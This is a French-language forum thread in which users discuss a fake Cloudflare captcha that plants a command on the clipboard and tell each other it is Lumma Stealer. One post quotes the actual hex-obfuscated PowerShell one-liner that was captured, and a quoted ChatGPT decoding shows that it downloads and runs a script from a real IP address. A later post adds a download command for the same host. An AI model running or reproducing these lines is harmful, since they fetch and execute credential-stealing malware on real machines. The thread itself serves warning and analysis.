Une nouvelle saloperie ?

[brunob]

Saluttatous.

En surfant "honnêtement" sur le web, je suis tombé sur une belle m... qui a dû en piéger un paquet à ce que je peux lire sur reddit notamment.

Une page se faisant passer pour cloudflare injecte dans le presse papiers un code malicieux "pour vérifier" te demande de faire win+R puis ctrl+V puis enter.

Si t'as le malheur de suivre les instructions tu lances une saloperie susceptible de voler tes identifiants (notamment les jetons qui remplacent les mots de passe) et de foutre le boxon dans tes comptes.

J'avais jamais entendu parler de cette vérole, heureusement que ces manip "bizarres" m'ont mis la puce à l'oreille on est tellement habitués à ces "cloudflares" surtout quand on est sous VPN qu'on se ferait facilement avoir.

[kiki37]

Salut
Tiens, à propos de VPN : celui là n'est pas mal !
https://www.lesnumeriques.com/vpn/un-pu ... 41600.html

[solar10]

[Unix-Linux]

Non, ce n'est pas nouveau, ça circule via les forums clandestins depuis 2022

C'est un malware : Lumma Stealer

From to May 2025, Microsoft identified 394,000 computers that were infected with Lumma

Démantèlement de Lumma Stealer : Microsoft conduit une action mondiale contre un outil prisé du cybercrime



Ajouté après : 12 minutes 53 secondes:

Salut
Tiens, à propos de VPN : celui là n'est pas mal !
https://www.lesnumeriques.com/vpn/un-pu ... 41600.html

You get what you pay for

[brunob]

Mmmhh connaissais pas mais c'est vicieux surtout l'association avec cloudfire.

Pour le VPN j'ai NordVPN ça marche pas mal surtout ici pour les TV limitées géographiquement.
Faut juste les niquer en désactivant le renouvellement et reprendre un nouvel abo sinon le prix double !

[Unix-Linux]

Pas compliqué, si le catchpa est véritablement provenant de cloudflare, c'est marqué dessus

Cloudfire ? Connais pas.

[solar10]

Pour les informaticiens, on sait très bien ce que l'enchaînement de commandes [Windows]+R > [CTRL]+V > [ENTER] fait. Surtout quand il y a un truc nasty dans le buffer du presse-papier.

[Unix-Linux]

Pour les informaticiens, on sait très bien ce que l'enchaînement de commandes [Windows]+R > [CTRL]+V > [ENTER] fait. Surtout quand il y a un truc nasty dans le buffer du presse-papier.

[brunob]

Pas compliqué, si le catchpa est véritablement provenant de cloudflare, c'est marqué dessus

Cloudfire ? Connais pas.

J'ai glissé chef !

Ajouté après : 4 minutes 39 secondes:

Pour les informaticiens, on sait très bien ce que l'enchaînement de commandes [Windows]+R > [CTRL]+V > [ENTER] fait. Surtout quand il y a un truc nasty dans le buffer du presse-papier.

Le raccourci clavier m'a justement fait vachement tiquer, je les connais et je ne voyais pas pourquoi il aurait fallu lancer un truc

Mais je n'avais jamais entendu que sans intervention un site puisse glisser un truc dans le presse papier !

On en apprend tous les jour malgré des années d'expérience !

[stéphane]

CTRL v c'est un fameux Red flag quand-même

[solitaire]

Capturé à l'instant..... (= ce qu'il y a dans 'un' Ctrl V)
!!! NE PAS EXECUTER !!!
powershell -window min [Text.Encoding]::UTF8.GetString([System.Runtime.Remoting.Metadata.W3cXsd2001.SoapHexBinary]::Parse('262867616c2063752a29202d7573656220687474703a2f2f3130342e3136342e35352e372f3039392f6d6f726f342e717c696578').Value)|powershell

si un pro peut nous dire où ça mène...!

[solar10]

Le matou GPT dit:
Cette ligne fait en fait trois choses :

1. Elle décode la chaîne hexadécimale
« 262867616c2063752a29202d7573656220687474703a2f2f3130342e3136342e35352e372f3039392f6d6f726f342e717c696578 »
en UTF-8 pour obtenir le texte suivant :
& (gal cu*) -useb http://104.164.55.7/099/moro4.q | iex

2. Elle pipe ce texte vers un nouvel appel PowerShell

3. Et ce texte, une fois exécuté, fait :
• `(gal cu*)` est équivalent à `Get-Alias cu*`, qui renvoie l’alias `curl` (alias de Invoke-WebRequest)
• `& ( … ) -UseBasicParsing http://…/moro4.q` lance donc `Invoke-WebRequest -UseBasicParsing` pour télécharger le fichier `moro4.q` depuis 104.164.55.7
• le résultat est ensuite piping dans `iex` (Invoke-Expression), c’est-à-dire exécuté comme du code PowerShell

En résumé, c’est un one-liner visant à récupérer à distance un script hébergé sur 104.164.55.7 et à l’exécuter immédiatement sur la machine.

[solitaire]

et le script dont question, il fait +- quoi?!

[Unix-Linux]

et le script dont question, il fait +- quoi?!

A récupérer des mots de passe, des cartes de crédit, des comptes bancaires et des portefeuilles de cryptomonnaies.

[solitaire]

et bien, ça c'est pas sympa !!

[solar10]

et le script dont question, il fait +- quoi?!

J'ai pas de machine Windows sous la main. Le matou GPT donne ces instructions pour le télécharger en sécurité :

Je ne peux pas télécharger directement ce script depuis l’extérieur (je n’ai pas d’accès réseau), mais je peux t’aider à l’analyser si tu me fournis son contenu.
Voici comment faire de ton côté, en PowerShell, en toute sécurité :

1. Ouvre une console PowerShell avec les droits appropriés (idéalement dans une machine virtuelle ou sandbox).
2. Télécharge le fichier sans l’exécuter :
Invoke-WebRequest -Uri "http://104.164.55.7/099/moro4.q" -UseBasicParsing -OutFile .\moro4.q

3. Ouvre ensuite le fichier avec un éditeur de texte ou affiche-le dans la console :
Get-Content .\moro4.q

4. Copie-colle-moi le contenu ici, et je te ferai une analyse détaillée (structures, appels externes, fonctions, éventuels comportements malveillants).

Si tu ne disposes pas d’un environnement isolé, ne l’exécute surtout pas avant d’avoir vérifié ce qu’il contient. Une fois le texte sous les yeux, je pourrai décrire chaque portion de code, expliquer les techniques utilisées et évaluer la dangerosité.


Donc, s'il ne fait pas des km, quelqu'un peu le coller ici ou l'envoyer via mp?

Added after 1 hour 38 minutes 47 seconds:
J'ai pu récupérer le fichier moro4.q mais je vois pas ce que ça fait.
Ah, j'ai dû contourner mes protections piHole pour y arriver. L'IP est apparemment connue comme nocive.

[Darksky]

L'IP est apparemment connue comme nocive.

Elle l'est, mais ne semble pas encore détectée par beaucoup d'AV actuellement.
Analyse VirusTotal
Après peut-être qu'à l'exécution, les autres AV chopent le truc.

[Unix-Linux]

Faudrait peut-être tout de même planquer cette adresse IP avant que le personnel de gestion informatique du spw walbonie ne clique dessus, pensant que c'est un download pour un antivirus gratuit contre la cyberttaque